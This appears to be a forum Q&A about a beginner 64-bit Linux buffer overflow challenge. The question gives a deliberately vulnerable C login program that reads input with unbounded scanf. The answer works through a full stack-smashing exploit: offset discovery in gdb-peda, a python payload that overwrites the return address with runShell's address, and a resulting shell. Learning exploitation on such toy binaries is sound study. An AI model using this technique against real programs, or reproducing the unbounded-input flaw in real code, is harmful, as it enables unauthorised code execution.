# Buffer overflow - linux 64bit

Tags: c, gcc, buffer, buffer-overflow

I have been working on a test program for the **"buffer overflow linux 64bit"** challenge. When launching the program, it prompts for a password.

The purpose is to exploit a **buffer overflow** fault at the password field to access the shell part. As I am a beginner in this field. I went to follow some tutorial on the net. I fell several times on this site before and during my research to better understand the source code found in `main.c` also in the link below.

I use **GDB** and **objdump** on Linux for breakpoints and disassembly.

**Findings/Steps taken:**

- The password entered is stored in `RSP` when I do the conversion of
  the shell address, which is of the kind on my PC `0x555555559bd` in
  ASCII.
- Then, I invert all I get: `½IUUUU`.
- When I enter this value as a password, I get address `0x555555559bd` exactly in  `RSP` registry.
- I also know that I can crush the value of `RBP` by typing for example: `aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa½IUUUU`.
- The address is written `"½IUUUU"` in `RBP`.

**Question:** That's where I'm blocked I would just like to know what kind of injection I could do to do a jump at address `0x9bd`?

Here is the file containing the source code and the cc command:
**http://mtnb.be/test_login_overflow.rar**.

**Code:**

```
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BANNER "\n\
BUFFER OVER FLOW TEST\n\
"

char passwd[33] = {0};

void readPasswd(){
  FILE *file = fopen("/home/user/passwd", "r");
  if (!file){
    puts("ERROR: Unable to read /home/user/passwd");
    exit(1);
  }
  fread(passwd, 1, 32, file);
}

void runShell()
{
  system("bash");
}


int check_passwd(){
  char debug = 0;
  char buffer[33] = {0};

  puts("Enter your password:");
  fflush(stdout);
  scanf("%s", buffer);

  if (debug){
    printf("runShell @ %p\n", runShell);
    fflush(stdout);
  }
  if (strncmp(passwd, buffer, 32))
    return 0;
  else
    return 1;
}

void login()
{
  while (1){
    if (check_passwd())
      break;
    puts("Invalid password !");
    fflush(stdout);
  }
  puts("Welcome admin, here is your shell !");
  fflush(stdout);
  runShell();
}

int main()
{
  char passwd[33] = {0};
  puts(BANNER);
  fflush(stdout);
  readPasswd();
  login();

  return 0;
}
```

Answer (score 0):

It is a simple buffer overflow, as you can see the buffer overflow happens in the **scanf** function:

```
  char buffer[33] = {0};

  puts("Enter your password:");
  fflush(stdout);
  scanf("%s", buffer);
```

To exploit it, first you should know the offset to overwrite the instruction program (RIP) and get the execution control,

I use gdb + PEDA:

```
gdb-peda$ pattern create 100 input
gdb-peda$ r < input
...
gdb-peda$ patts
Registers contain pattern buffer:
RBP+0 found at offset: 48
Registers point to pattern buffer:
[RSP] --> offset 56 - size ~44
...
```

Now, we have the offset to exploit the buffer overflow. So, we can get the EIP control.

```
[manu@debian /tmp]$ python -c 'print "A"*56+"BBBBBBBB"' > input


gdb-peda$ r < input
...
   0x4008b7 <check_passwd+174>: leave  
=> 0x4008b8 <check_passwd+175>: ret 
...    
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe248 ("BBBBBBBB")
```

We know that when the ret instruction is called, the EIP will be the address in the top of the stack. So, we change te address by *0x4007f9* and run the shell.

```
[manu@debian /tmp]$ readelf -s bof
...
    60: 0000000000600ee0     0 NOTYPE  GLOBAL DEFAULT   24 __data_start
    61: 00000000004007f9    16 FUNC    GLOBAL DEFAULT   13 runShell
    62: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND __gmon_start__
...

[manu@debian /tmp]$ python -c 'print "A"*56+"\xf9\x07\x40\x00\x00\x00\x00\x00"' > input
[manu@debian /tmp]$ (cat input;cat) | ./bof 

BUFFER OVER FLOW TEST

Enter your password:
runShell @ 0x4007f9
id
uid=1000(manu) gid=1000(manu) grupos=1000(manu),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),119(bluetooth)
```